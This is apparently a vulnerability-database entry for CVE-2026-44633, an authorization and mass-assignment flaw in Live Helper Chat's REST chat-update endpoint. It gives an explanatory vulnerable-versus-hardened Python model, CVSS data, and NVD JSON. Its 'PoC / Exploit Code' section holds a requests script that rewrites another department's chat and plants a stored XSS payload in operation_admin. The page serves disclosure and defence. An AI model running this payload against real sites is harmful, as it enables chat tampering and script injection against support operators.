Security Vulnerability Report
CVE-2026-44633 CVSS 8.1 HIGH

CVE-2026-44633

Published: 2026-05-14 19:16:38
Last Modified: 2026-05-14 20:17:09

Description

Live Helper Chat is an open-source application that enables live support websites. In 4.84v, the Live Helper Chat REST API chat update endpoint allows a REST user with lhchat/use to update a chat in a department they cannot read. The endpoint accepts arbitrary chat object fields, so the user can change the chat hash and status and then access or tamper with the chat through visitor/widget paths. The same write primitive can set operation_admin, which is later emitted as operator-side JavaScript.
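The description names two independent defects: a missing object-level authorization check (the caller holds lhchat/use but cannot read the chat's department, CWE-863) and a mass-assignment write that lets any chat field, including hash and operation_admin, be set from the request body. The following is an added example, not Live Helper Chat's code: a minimal Python model of the flawed handler next to a hardened one that adds the department check and a field allowlist. The names User, sample_chats, USERS, UPDATABLE_FIELDS, update_chat_vulnerable, update_chat_hardened and try_update, and the sample data, are assumptions made for illustration; only the fields hash, status and operation_admin, the lhchat/use permission and the department concept come from the advisory.

```python
# Added example (not Live Helper Chat's code). All names and sample data below are
# constructed for illustration; only hash/status/operation_admin, the lhchat/use
# permission and the notion of a chat's department come from the advisory text.
from dataclasses import dataclass


class AuthorizationError(Exception):
    """Raised when the caller may not perform the requested update."""


@dataclass(frozen=True)
class User:
    name: str
    permissions: frozenset
    departments: frozenset  # departments whose chats the user may read


def sample_chats():
    """Constructed sample data: one chat that belongs to department 7."""
    return {
        42: {"id": 42, "department_id": 7, "hash": "orig-hash",
             "status": "pending", "operation_admin": ""},
    }


# Constructed users: a REST user who cannot read department 7, and an agent who can.
USERS = {
    "restuser": User("restuser", frozenset({"lhchat/use"}), frozenset({1, 2})),
    "agent7": User("agent7", frozenset({"lhchat/use"}), frozenset({7})),
}

# Fields a client may change through the update endpoint. hash, department_id and
# operation_admin are deliberately absent: they are server-controlled.
UPDATABLE_FIELDS = frozenset({"status", "remarks"})


def update_chat_vulnerable(chats, user, chat_id, fields):
    """Models the flawed behaviour: a function-level permission check only, no
    object-level department check, and every submitted key written into the chat."""
    if "lhchat/use" not in user.permissions:
        raise AuthorizationError("missing lhchat/use")
    chat = chats[chat_id]
    chat.update(fields)  # hash, status, operation_admin ... all writable
    return chat


def update_chat_hardened(chats, user, chat_id, fields):
    """Same endpoint with the two checks the advisory implies were missing."""
    if "lhchat/use" not in user.permissions:
        raise AuthorizationError("missing lhchat/use")
    chat = chats[chat_id]
    # Object-level authorization: the caller must be able to read the chat's department.
    if chat["department_id"] not in user.departments:
        raise AuthorizationError(
            f"{user.name} may not access department {chat['department_id']}")
    # Field allowlist: reject, rather than silently drop, unknown keys so that probing
    # for writable fields shows up as client errors in the API log.
    unexpected = set(fields) - UPDATABLE_FIELDS
    if unexpected:
        raise ValueError(f"not updatable via this endpoint: {sorted(unexpected)}")
    chat.update(fields)
    return chat


def try_update(handler, user, chat_id, fields):
    """Run a handler against fresh sample data; return ("ok", chat) or ("denied", reason)."""
    chats = sample_chats()
    try:
        return "ok", handler(chats, user, chat_id, fields)
    except (AuthorizationError, ValueError) as exc:
        return "denied", f"{type(exc).__name__}: {exc}"


if __name__ == "__main__":
    cross_dept = {"hash": "attacker-chosen", "status": "active",
                  "operation_admin": "untrusted-js"}
    print(try_update(update_chat_vulnerable, USERS["restuser"], 42, cross_dept))
    print(try_update(update_chat_hardened, USERS["restuser"], 42, cross_dept))
    print(try_update(update_chat_hardened, USERS["agent7"], 42, {"status": "active"}))
    print(try_update(update_chat_hardened, USERS["agent7"], 42, {"operation_admin": "x"}))
```

The two checks are separate on purpose: the department test alone would still let an in-department user rewrite hash or operation_admin, and the allowlist alone would still let an out-of-department user change status. Rejecting unknown keys with an error instead of ignoring them also turns field-probing into a log signal.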

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Live Helper Chat 4.84v

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target API endpoint
url = "http://target-site.com/api/rest/lhcchat/update_chat"

# Session cookie of the low-privileged REST user
cookies = {
    "LHC_SESSIONID": "low_privileged_session_id"
}

# Vulnerable Payload
# Exploiting the arbitrary field write to set operation_admin with XSS
payload = {
    "chat_id": "TARGET_CHAT_ID",
    "hash": "modified_hash_value",
    "status": "active",
    "operation_admin": "<img src=x onerror=alert('XSS')>"
}

try:
    response = requests.post(url, data=payload, cookies=cookies)
    if response.status_code == 200:
        print("[+] PoC successful: Chat updated with malicious payload.")
        print("[+] When an operator views this chat, the XSS will trigger.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] Error: {e}")

References

https://github.com/LiveHelperChat/livehelperchat/security/advisories/GHSA-hjqq-qmvj-9whm

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44633", "sourceIdentifier": "[email protected]", "published": "2026-05-14T19:16:38.293", "lastModified": "2026-05-14T20:17:08.607", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Live Helper Chat is an open-source application that enables live support websites. In 4.84v, the Live Helper Chat REST API chat update endpoint allows a REST user with lhchat/use to update a chat in a department they cannot read. The endpoint accepts arbitrary chat object fields, so the user can change the chat hash and status and then access or tamper with the chat through visitor/widget paths. The same write primitive can set operation_admin, which is later emitted as operator-side JavaScript."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://github.com/LiveHelperChat/livehelperchat/security/advisories/GHSA-hjqq-qmvj-9whm", "source": "[email protected]"}, {"url": "https://github.com/LiveHelperChat/livehelperchat/security/advisories/GHSA-hjqq-qmvj-9whm", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}